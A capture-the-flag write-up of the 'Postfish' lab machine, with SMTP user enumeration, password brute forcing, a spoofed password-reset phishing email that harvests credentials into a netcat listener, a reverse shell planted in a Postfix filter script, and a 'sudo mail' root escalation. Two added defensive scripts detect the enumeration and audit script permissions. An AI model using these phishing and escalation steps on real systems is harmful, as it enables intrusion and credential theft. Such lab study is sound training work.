# Postfish

## Nmap

```
sudo nmap 192.168.211.137 -p- -sS -sV -Pn

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
25/tcp  open  smtp     Postfix smtpd
80/tcp  open  http     Apache httpd 2.4.41 ((Ubuntu))
110/tcp open  pop3     Dovecot pop3d
143/tcp open  imap     Dovecot imapd (Ubuntu)
993/tcp open  ssl/imap Dovecot imapd (Ubuntu)
995/tcp open  ssl/pop3 Dovecot pop3d
Service Info: Host:  postfish.off; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Heading straight into SMTP, I ran `smtp-user-enum.pl` with the syntax below:

```
sudo perl smtp-user-enum.pl -M VRFY -U /usr/share/seclists/Usernames/Names/names.txt -t 192.168.211.137 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-955ab08a253628cdd054ee503bb70080b7b7a80c%2Fimage.png?alt=media)

The output above shows some non-default accounts, which are listed below:

```
hr
sales
```

Checking port 80 from here, we find that the web page attempts to redirect us to <http://postfish.off>. Adding the IP address and domain name to `/etc/hosts` gets this working; once that is done, the web pages load correctly.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0132657c2f04e83bb81ce3c741dd13f689e7a9d5%2Fimage.png?alt=media)

Checking out the link for 'Our Team' shows further departments and users.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-41ff83a3060decd40fff0fbd50ccdbc01f60992f%2Fimage.png?alt=media)

We can run these names against `smtp-user-enum` to try to identify further usernames. Companies generally follow a naming convention for accounts, so we can either guess the convention or use a tool to generate the likely variations for us.

Download the following python script: <https://raw.githubusercontent.com/jseidl/usernamer/master/usernamer.py>

We can then run the script against each name, and it will generate variations of the username.

```
python2 exploit.py -n 'USER'  
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ed53fa2b24510dba6ee52cf645c7746439df08ac%2Fimage.png?alt=media)

Repeat for each user and save the results into a text file. We can then run the variations against `smtp-user-enum` again.

```
perl smtp-user-enum.pl -M VRFY -U /home/kali/Desktop/known-users -t 192.168.211.137 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e257127ab9631c556d5788d1fe7b54029a4a634d%2Fimage.png?alt=media)

At this point I tried to brute force the various accounts we have over IMAP and POP3. I was able to get a valid result with Hydra for `sales:sales`.

The password list was generated with `cewl` from the <http://postfish.off/team.html> web page.

```
cewl -d 5 -m 3 http://postfish.off/team.html -w /home/kali/Desktop/cewl.txt
```

I then ran our known usernames with the output generated from `cewl` against `Hydra`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2910076bba4cf6b5e485128a36abf0d972a59561%2Fimage.png?alt=media)

I then logged into the sales account with telnet on port 110 for POP3 and was able to retrieve a single email message.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-680e038801c49510f1d2eab12791cd2ae3c44d0c%2Fimage.png?alt=media)
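From the defender's side, the VRFY enumeration and the Hydra run above each leave a distinct footprint in the mail logs. The following added example (not from the original writeup) counts both per client IP over constructed Postfix and Dovecot syslog lines; the IP addresses, usernames and timestamps in the sample are made up for illustration.

```python
import re
from collections import defaultdict

# Postfix smtpd rejecting a VRFY probe for an unknown local user, and Dovecot
# logging a failed POP3/IMAP login: the two footprints that smtp-user-enum
# and Hydra leave behind on the mail server.
VRFY_RE = re.compile(r"postfix/smtpd\[\d+\]: NOQUEUE: reject: VRFY from \S+?\[(?P<ip>[\d.]+)\].*?to=<(?P<user>[^>]*)>")
AUTH_FAIL_RE = re.compile(r"dovecot: (?:pop3|imap)-login: Disconnected \(auth failed.*?user=<(?P<user>[^>]*)>.*?rip=(?P<ip>[\d.]+)")

# Constructed sample lines modelled on Postfix and Dovecot syslog output,
# not captured from the Postfish machine.
SAMPLE_LOG = """\
Jan 10 10:00:01 postfish postfix/smtpd[1201]: NOQUEUE: reject: VRFY from unknown[192.168.49.211]: 550 5.1.1 <aaron>: Recipient address rejected: User unknown in local recipient table; to=<aaron> proto=SMTP helo=<test>
Jan 10 10:00:01 postfish postfix/smtpd[1201]: NOQUEUE: reject: VRFY from unknown[192.168.49.211]: 550 5.1.1 <abbey>: Recipient address rejected: User unknown in local recipient table; to=<abbey> proto=SMTP helo=<test>
Jan 10 10:00:02 postfish postfix/smtpd[1201]: NOQUEUE: reject: VRFY from unknown[192.168.49.211]: 550 5.1.1 <abbie>: Recipient address rejected: User unknown in local recipient table; to=<abbie> proto=SMTP helo=<test>
Jan 10 10:05:00 postfish postfix/smtpd[1310]: NOQUEUE: reject: VRFY from mail.example.net[10.0.0.5]: 550 5.1.1 <bob>: Recipient address rejected: User unknown in local recipient table; to=<bob> proto=SMTP helo=<mail.example.net>
Jan 10 10:12:40 postfish dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<sales>, method=PLAIN, rip=192.168.49.211, lip=192.168.211.137, session=<a1>
Jan 10 10:12:40 postfish dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<hr>, method=PLAIN, rip=192.168.49.211, lip=192.168.211.137, session=<a2>
Jan 10 10:12:41 postfish dovecot: imap-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<brian.moore>, method=PLAIN, rip=192.168.49.211, lip=192.168.211.137, session=<a3>
Jan 10 10:12:43 postfish dovecot: pop3-login: Login: user=<sales>, method=PLAIN, rip=192.168.49.211, lip=192.168.211.137, mpid=1422, session=<a4>
"""


def flag_sources(log_text, threshold=3):
    """Return {ip: counts} for clients with >= threshold VRFY probes or auth failures."""
    stats = defaultdict(lambda: {"vrfy_probes": 0, "vrfy_users": set(), "auth_failures": 0})
    for line in log_text.splitlines():
        if m := VRFY_RE.search(line):
            stats[m["ip"]]["vrfy_probes"] += 1
            stats[m["ip"]]["vrfy_users"].add(m["user"])
        elif m := AUTH_FAIL_RE.search(line):
            stats[m["ip"]]["auth_failures"] += 1
    flagged = {}
    for ip, s in stats.items():
        if s["vrfy_probes"] >= threshold or s["auth_failures"] >= threshold:
            # Many distinct probed names from one client is the enumeration
            # footprint; repeated auth failures is the password-guessing one.
            flagged[ip] = {"vrfy_probes": s["vrfy_probes"],
                           "vrfy_users": len(s["vrfy_users"]),
                           "auth_failures": s["auth_failures"]}
    return flagged


if __name__ == "__main__":
    for ip, counts in flag_sources(SAMPLE_LOG).items():
        print(ip, counts)
```

The successful `Login:` line is deliberately not counted, so a client that eventually guesses right is still flagged on its failures.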

The email indicates that the IT team (<it@postfish.off>) will be sending password reset links to the sales team. From here we can potentially spear phish someone. Looking at <http://postfish.off/team.html> again shows that Brian Moore is the sales manager, and we already know his email address from our earlier SMTP enumeration.

First set up a `netcat` listener on port 80.

```
sudo nc -lvp 80
```

Next connect to SMTP using `netcat` then do the following to compose an email from <it@postfish.off> to <brian.moore@postfish.off>.

```
nc -v postfish.off 25
```

```
helo test
MAIL FROM: it@postfish.off
RCPT TO: brian.moore@postfish.off
DATA

Subject: Password reset process

Hi Brian,

Please follow this link to reset your password: http://192.168.49.211/

Regards,

.

QUIT
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ae02330537407af5b5cdf6adffe9e1acf8f6c14f%2Fimage.png?alt=media)

After a short while, Brian follows the link and his current login details arrive at our `netcat` listener.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-544dee1e3e40d566146e59ce5e1d72d30a297ac1%2Fimage.png?alt=media)

We now have the password `EternaLSunshinE` and can log in over SSH.

```
ssh brian.moore@192.168.211.137
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-dc6c9e247211f8ee580fcdd8fc14c45a3460bcef%2Fimage.png?alt=media)

I then transferred `linpeas` over to the target machine. After running it, we see that our user is a member of the 'filter' group, which is not a default group. We also find `/etc/postfix/disclaimer`, which is of interest.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4462113fe2ca6cb17570ea24d9b2f4f075c5e834%2Fimage.png?alt=media)

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ef00382f73706bad5aa59ae58703adec0416055a%2Fimage.png?alt=media)

A Google search on 'postfix disclaimer' results in the following being the first result on Google: <https://www.howtoforge.com/how-to-automatically-add-a-disclaimer-to-outgoing-emails-with-altermime-postfix-on-debian-squeeze>.

Looking through this, it seems the admin of the box has followed the steps in that article to install and configure alterMIME so that disclaimers get appended to emails.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4f92fb14bc9955dc6b467e804dbaf4e51a229330%2Fimage.png?alt=media)

Reading through the article, the setup works as follows: whenever an address listed in `/etc/postfix/disclaimer_addresses` sends or receives an email, Postfix executes the script `/etc/postfix/disclaimer`. That script takes the contents of `/etc/postfix/disclaimer.txt` and appends it to the message.

As we are a member of the group 'filter', we can edit the script `/etc/postfix/disclaimer`. Using nano to edit the script, I inserted a bash reverse shell at the top of the script.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-690c77c2ba88f0a3fc6efa4b494e770141c0c217%2Fimage.png?alt=media)
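The weakness being used here is that a script Postfix executes for every matching message is writable by a group that contains an ordinary user. As an added example (not part of the original writeup), the following audit flags group- or world-writable permission bits on such a script and any member of its owning group other than the `filter` service account; the expected-member set is an assumption taken from the howtoforge setup, and the default path is the one found on this box.

```python
import grp
import os
import stat
import sys

# In the howtoforge alterMIME setup the disclaimer script belongs to a
# dedicated "filter" service account, so that is the only group member we
# expect (an assumption about the intended configuration, not a fact of the box).
EXPECTED_GROUP_MEMBERS = {"filter"}


def mode_findings(mode):
    """Permission-bit findings for a script that Postfix executes per message."""
    findings = []
    if mode & stat.S_IWGRP:
        findings.append("group-writable: any member of the owning group can alter what Postfix runs")
    if mode & stat.S_IWOTH:
        findings.append("world-writable: any local user can alter what Postfix runs")
    return findings


def group_findings(group_name, members, expected=EXPECTED_GROUP_MEMBERS):
    """Findings for members of the owning group that are not the filter account."""
    extra = sorted(set(members) - set(expected))
    return [f"unexpected member of group {group_name}: {m}" for m in extra]


def audit_filter_script(path, expected=EXPECTED_GROUP_MEMBERS):
    """Audit one content-filter script: permission bits plus owning-group membership.

    Caveat: grp only lists supplementary members from /etc/group; a user whose
    primary group is the filter group would need a pwd scan as well.
    """
    st = os.stat(path)
    findings = mode_findings(st.st_mode)
    try:
        gr = grp.getgrgid(st.st_gid)
        findings += group_findings(gr.gr_name, gr.gr_mem, expected)
    except KeyError:
        findings.append(f"owning gid {st.st_gid} has no /etc/group entry")
    return findings


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "/etc/postfix/disclaimer"
    for finding in audit_filter_script(target) or ["no findings"]:
        print(f"{target}: {finding}")
```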

Then, as we did earlier, I connected to SMTP with `netcat` and sent an email to trigger the shell.

```
helo test
MAIL FROM: it@postfish.off
RCPT TO: brian.moore@postfish.off
DATA

Shell please

.

QUIT
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b94b839fed1eed990531c038fbe5444047e4ecc6%2Fimage.png?alt=media)

After doing so we should receive a shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ab40b7173d36671f6f6432b96e5b4b63d1bf5893%2Fimage.png?alt=media)

From here I checked sudo permissions with `sudo -l` and found that we can run the `mail` binary as any user without a password.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-29fc3f7cde02ef9f0f157843cac83e9123f78593%2Fimage.png?alt=media)

Referring to [GTFOBins](https://gtfobins.github.io/gtfobins/mail/) we can use this to gain a root shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c476006b1c9f04bdf606bb3be7944b1171e233a1%2Fimage.png?alt=media)

```
sudo mail --exec='!/bin/bash'
```

We then gain a root shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a18e98cbb488f752e12f841b9c0863531680c1f3%2Fimage.png?alt=media)
